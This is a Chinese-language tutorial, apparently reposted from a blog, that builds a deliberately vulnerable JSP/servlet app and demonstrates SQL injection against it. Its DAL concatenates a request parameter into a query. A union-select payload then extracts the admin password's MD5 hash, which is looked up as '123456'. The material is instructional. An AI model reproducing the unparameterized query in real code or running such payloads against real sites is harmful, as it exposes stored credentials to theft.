例子 要查詢信息 并顯示出來

SQL? 信息表與admin表 插入信息 md5 加密的密碼

CREATE TABLE `admin` ( `Id` int(11) NOT NULL AUTO_INCREMENT, `Name` varchar(40) NOT NULL, `Psw` varchar(100) NOT NULL, PRIMARY KEY (`Id`) )ENGINE=InnoDB DEFAULT CHARSET=utf8;CREATE TABLE `info` ( `Id` int(11) NOT NULL AUTO_INCREMENT, `Info` varchar(40) NOT NULL, PRIMARY KEY (`Id`) )ENGINE=InnoDB DEFAULT CHARSET=utf8;insert into info(`Info`) values('SQLinject'); insert into admin(`Name`,`Psw`) values('admin','E10ADC3949BA59ABBE56E057F20F883E');

開始頁---點擊傳參 --查詢信息

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <% String path = request.getContextPath(); String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; %><!DOCTYPE HTML> <html><head><base href="<%=basePath%>"><title>SQL注入測試</title></head><body><% String info="SQLinject"; %><a href="Info?info=<%=info%>"> 查詢info的信息 </a></body> </html>
查詢servlet

package servlet;import javax.servlet.http.HttpServlet;import java.io.IOException;import javax.servlet.RequestDispatcher; import javax.servlet.ServletException; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse;import dal.infodal; import java.sql.*;public class info extends HttpServlet{String ms="";@Overrideprotected void service(HttpServletRequest req, HttpServletResponse res)throws ServletException, IOException {//取得表單數據String info="";if(req.getParameter("info")!=""&&req.getParameter("info").length()<100){ info=new String(req.getParameter("info").getBytes("ISO-8859-1"),"UTF-8");}else{ms+="info不正確"; }ResultSet rs=infodal.serchinfo(info);ms="信息查詢成功";req.setAttribute("rs", rs);req.setAttribute("ms", ms);RequestDispatcher rd=req.getRequestDispatcher("inforesult.jsp");rd.forward(req,res);}} 查詢DAL

package dal; import java.sql.*;import constant.dbconstant;public class infodal {public static ResultSet serchinfo(String info){String driverClass=dbconstant.getDriverclass();String url=dbconstant.getUrl();String dbUser = dbconstant.getDbuser(); String dbPwd = dbconstant.getDbpwd(); try{ Class.forName(driverClass); Connection con = DriverManager.getConnection(url,dbUser,dbPwd);Statement stmt=con.createStatement(); // String sql="select id,Info from info where Info='"+info+"'";ResultSet rs=stmt.executeQuery(sql); return rs;}catch(Exception ex){ System.out.print("連接失敗！！<br>"+ex.toString()); return null;} }}
顯示查詢信息

<%@ page language="java" import="java.util.*" import="java.sql.*" import="constant.dbconstant" pageEncoding="UTF-8"%> <% String path = request.getContextPath(); String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; %><!DOCTYPE HTML> <html><head><base href="<%=basePath%>"><title>SQL注入測試</title></head><body><%ResultSet rs=(ResultSet)request.getAttribute("rs");while(rs.next()) {%><p> 查詢的信息為: <%=rs.getInt("Id") %> </p> <br><p> 查詢的信息為: <%=rs.getString("Info") %> </p> <br> <p> 查詢的信息為: <%=rs.getNString(2) %> </p> <br><%}%><% String msg=""; msg=(String)request.getAttribute("ms"); if(msg==null){ msg=""; }else{ request.removeAttribute("ms"); }%><%=msg %><script type="text/javascript"> window.οnlοad=function(){ if("<%=msg%>"!="") {alert("<%=msg%>"); //self.location="inforesult.jsp";} }</script> </body> </html>
web.xml

<?xml version="1.0" encoding="UTF-8"?> <web-app><servlet><servlet-name>Info</servlet-name><servlet-class>servlet.info</servlet-class></servlet><servlet-mapping><servlet-name>Info</servlet-name><url-pattern>/Info</url-pattern></servlet-mapping></web-app>
?以上為很常見的jsp過程?? 參數info 沒有過濾 也沒有參數化查詢

注入語句

SQLinject' union select 2,Psw from admin where Name='admin
2 為常數? 因為要對齊info 個數為2 int stirng??

查詢語句為

select Id,Info from Info where Info='SQLinject' union select 2,Psw from admin where Name='admin';

查詢出來的信息為

info 的 Id???? Info??????????????????? 1?????? 'SQLinject'

?????????? 2?????? Psw?????????????????? 2????? 'E10ADC3949BA59ABBE56E057F20F883E'

E10ADC3949BA59ABBE56E057F20F883E 為md5密碼? 在線查詢? 123456

總結

以上是生活随笔為你收集整理的jsp mysql 注入攻击实例的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。